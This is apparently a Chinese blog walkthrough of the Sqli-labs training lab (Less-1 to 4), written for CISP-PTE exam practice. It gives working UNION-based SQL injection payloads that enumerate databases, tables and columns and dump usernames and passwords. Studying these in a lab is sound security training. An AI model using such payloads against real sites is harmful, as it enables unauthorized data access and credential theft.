起因
近期打算考一下CISP-PTE,所以找出了多年前的Sqli-libs,准备再刷一遍sql注入,把一些要点记录一下方便以后复习,并和大家分享一下。
准备知识
Sqli-libs使用了mysql数据库,如果你对mysql比较精通,可以跳过本段。
在Sqli-libs中我们需要了解mysql这几个库、表和字段。
- information_schema数据库表
它保存着关于MySQL服务器所维护的所有其他数据库的信息。
我们重点关注这三个表。SCHEMATA、TABLES、COLUMNS。 - SCHEMATA表:提供了当前mysql实例中所有数据库的信息。
SCHEMA_NAME SCHEMA名称 即所有的数据库名。
- TABLES表:提供了关于数据库中的表的信息(包括视图)。
TABLE_SCHEMA:所属的数据库
TABLE_NAME:表名
- COLUMNS表:提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。
TABLE_SCHEMA:所属的数据库
TABLE_NAME:表名
COLUMNS_NAME:字段名
大部分操作都和这些有关。
环境
环境:Sqli-libs phpstudy Firefox hackbar burpsuite 菜刀 …
sqli-labs
phpstudy
浏览器看个人喜好 其它工具百度
关于环境配置部署这里不多说,网上太多了,直接进入正题。
打开后是这个样子,url可能不一样,这个无所谓。这里说明一下,我使用了winserver2003的虚拟机,其实用不用都可以的。
我们看到在Page-1中get篇有十道题。(如下所示)
sql注入原理
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应
用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操
作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
我的理解就是把一条正常的sql语句截断,闭合前面的部分,注释后面的部分,在截断处写入完成你目的sql语句,从而进行注入。简单来讲就是改sql语句。
开搞
- Less-1
根据提示参数为id
第一步通常先使原有的sql语句报错。要改别人的sql语句,我们就要先知道这个sql语句是怎么写的嘛。使其报错就是这个目的。
加入 ’ ,使正常的sql语句报错。
根据报错的信息,我们可以猜测后台的语句是这样写的。
select XXX from XXX where id=”$_GET[‘id’]” linit 0,1
大概可以判断出,可以使用 ’ 对前面的语句闭合 后面的语句我们用 %23注释
%23 即十六进制的 # 号 mysql还有其它的注释方式,这里我习惯用%23
没有报错,说明成功了,我们的思路是正确的
插一句,因为要使用联合查询这里需要猜一下列数
方法就是: select 1,2,3… 每次加一个,从一个数字开始,直到不报错为止,任意数字都可以,这里的数字只起到占位的作用.
我们可以看到有三个数字时,没有报错,因此为三列。
这个方法有点傻,但比较简单,我们后面会说一些别的。
接下来在截断处加入sql语句
?id=0'union select 1,group_concat(schema_name),3 from information_schema.schemata %23
爆所有数据库名
?id=0'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23
爆当前数据库下所有表
database() 返回默认或当前数据库的名称
group_concat() 返回带有来自一个组的连接的非NULL值的字符串结果
我们选择 user表
?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name = 'users'%23
爆字段名
根据字段,爆用户和密码
?id=0' union select 1,group_concat(concat_ws(":",username,password)),3 from users %23
concat_ws(separator,str1,str2,…) 这个函数是为了方便查看
第一个参数是其它参数的分隔符。分隔符的位置放在要连接的两个字符串之间。分隔符可以是一个字符串,也可以是其它参数。如果分隔符为 NULL,则结果为 NULL。函数会忽略任何分隔符参数后的 NULL 值。但是CONCAT_WS()不会忽略任何空字符串。 (然而会忽略所有的 NULL)。
- Less-2
加 ’ 判断,发现本题无需闭合。 最外面的一对单引号是mysql的提示,并非原有的sql语句的。
用 and 1=1判断 没有报错 本题为数字型注入
当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。
判断方法
加and 1=1 语句执行正常,与原始页面无任何差异
加and 1=2 语句可以正常执行,但是无法查询出结果,所以返回数据与原始网页存在差异
?id=-1 union select 1,database(),3 %23 显示当前数据库
id=-1 这里为了让前面出错从而执行后面的联合查询
爆用户名密码
?id=-1 union select 1,group_concat(concat_ws(":",id,username,password)),3 from users %23
- Less-3
同类型就不讲那么细了。
直接加 ’ 使其报错
可以看出本题闭合是 ‘)其它的和第一题相同
爆用户名密码
?id=-1') union select 1,group_concat(concat_ws(":",username,password)),3 from users %23
- Less-4
这里注意,加 ’ 号后没有错误提示,改为加 “ 号,报错。
这里可以看出,闭合为 ")
爆用户名密码
?id=-1") union select 1,group_concat(concat_ws(":",username,password)),3 from users %23